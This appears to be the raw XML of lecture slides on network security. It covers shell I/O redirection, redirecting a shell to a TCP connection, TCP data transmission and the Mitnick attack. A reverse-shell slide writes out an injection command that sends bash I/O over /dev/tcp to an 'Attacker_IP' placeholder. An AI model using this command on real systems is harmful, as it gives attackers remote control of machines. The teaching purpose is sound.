              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>command &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>myfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or command 0&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>myfile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&gt; output redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>command &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>myfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or command 1&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>myfile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General format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>descriptor   read (&lt;)/write (&gt;) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>permission  new entry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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01" y="3490844"/>
            <a:ext cx="4361277" cy="125992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490844"/>
            <a:ext cx="4511346" cy="1045203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1866492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410A-F029-4843-BC57-9A5B832C42A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I/O Redirect Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7A1DB60-0AAF-44C0-854A-C8263E2BC275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="768566" y="1663700"/>
            <a:ext cx="3353491" cy="382794"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A picture containing large, wooden, street, people&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B88A2D7-ACB9-4D3D-A223-9BE7D0B5D022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="768566" y="2271291"/>
            <a:ext cx="3365574" cy="825716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A close up of a sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC52068E-B92E-40F9-9E2B-8B9C7AA6714C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956391" y="1599636"/>
            <a:ext cx="3065531" cy="510922"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A picture containing people, large, group, city&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{380533D0-F36C-4EDD-8AD8-2224D1723CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956390" y="2442178"/>
            <a:ext cx="3416177" cy="1607308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1471341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38E9-A1CD-4FF5-8BE1-E1B1AA52A39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Redirecting I/O to TCP Connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A close up of a sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC7054BF-D77F-4476-A45B-D3DBFD02D24E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="888083" y="1451654"/>
            <a:ext cx="2781320" cy="442916"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C4C745C-9CC0-4390-8CC8-DAF8230E0305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937098" y="1451654"/>
            <a:ext cx="4129118" cy="433391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A close up of a sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02F5C4F6-6EB3-4C87-9F17-608202EF344D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2451202" y="2350405"/>
            <a:ext cx="3138510" cy="762006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2553782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211387"/>
            <a:ext cx="8211416" cy="620649"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Shell </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284236" y="795830"/>
            <a:ext cx="4583462" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>File descriptor 0 represents the standard input device (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>) and 1 represents the standard output device (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>). Since the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> is already redirected to the TCP connection, this option basically indicates that the shell program will get its input from the same TCP connection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462529" y="3224743"/>
            <a:ext cx="2692483" cy="1246495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>File descriptor 2 represents the standard error (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>). This cases the error output to be redirected to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, which is the TCP connection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="705135" y="3230682"/>
            <a:ext cx="2066193" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>The option </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> stands for interactive, meaning that the shell should be interactive.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2869455" y="3224744"/>
            <a:ext cx="2514950" cy="1246495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>This causes the output device (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>) of the shell to be redirected to the TCP connection to 10.0.2.70’s port 9090.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19462446">
            <a:off x="2079160" y="2947617"/>
            <a:ext cx="454525" cy="1596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ight Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19462446">
            <a:off x="4078571" y="2918601"/>
            <a:ext cx="411331" cy="14457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ight Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19462446">
            <a:off x="6000602" y="2898628"/>
            <a:ext cx="404180" cy="150643"/>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0" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1614380" y="2548656"/>
            <a:ext cx="5741797" cy="279847"/>
            <a:chOff x="2901855" y="1037012"/>
            <a:chExt cx="5741797" cy="279847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Connector 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2901855" y="1301736"/>
              <a:ext cx="1539005" cy="151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57446" y="1294573"/>
              <a:ext cx="2852852" cy="2228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490167" y="1264835"/>
              <a:ext cx="458343" cy="687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119009" y="1287056"/>
              <a:ext cx="524643" cy="20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328" y="1037012"/>
              <a:ext cx="5725324" cy="228632"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3965680">
            <a:off x="6921814" y="2373258"/>
            <a:ext cx="247748" cy="11171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175344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38E9-A1CD-4FF5-8BE1-E1B1AA52A39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Redirecting I/O to TCP Connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD6BF05-E947-4BA6-ACF2-420D72E7B197}"/>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How about server does not run a shell? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When we inject our code during an attack, our code may not be injected into a running shell program on the server, so the redirection symbols in the command string cannot be interpreted. Inject</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/bin/bash -c “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>any_shell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&gt;/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcp</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Attacker_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/port 0&lt;&amp;1 2&gt;&amp;1”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="816394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DD01-6286-EC60-2034-68FDB4CA53B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Why the Connection Freezes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91EF8B7B-AECF-CA7F-0C98-ABC70E23C3F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1588794" y="1508013"/>
            <a:ext cx="5803944" cy="2951344"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199606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Data Transmission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 120"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8520600" cy="4057800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Each octet in the send buffer has a sequence number field in the header which indicates the sequence of the packets. At the receiver end, these sequence numbers are used to place data in the right position inside receive buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once data is placed in the receive buffer, they are merged into a single data stream. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Applications read from the receive buffer. If no data is available, it typically gets blocked. It gets unblocked when there is enough data to read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The receiver informs the sender about receiving of data using acknowledgement packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Mitnick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploited the trusted relationship between two computers by performing man-in-the-middle attack under a spoofed identity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37" y="2234996"/>
            <a:ext cx="2049935" cy="28699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720" y="3074636"/>
            <a:ext cx="1619250" cy="11906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2594" y="2798412"/>
            <a:ext cx="1619250" cy="17430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392" y="2192159"/>
            <a:ext cx="1510282" cy="2349328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3323419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23F5-8304-091D-F8BA-31B943108CEC}"/>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Mitnick Attack: Technical Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2049" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
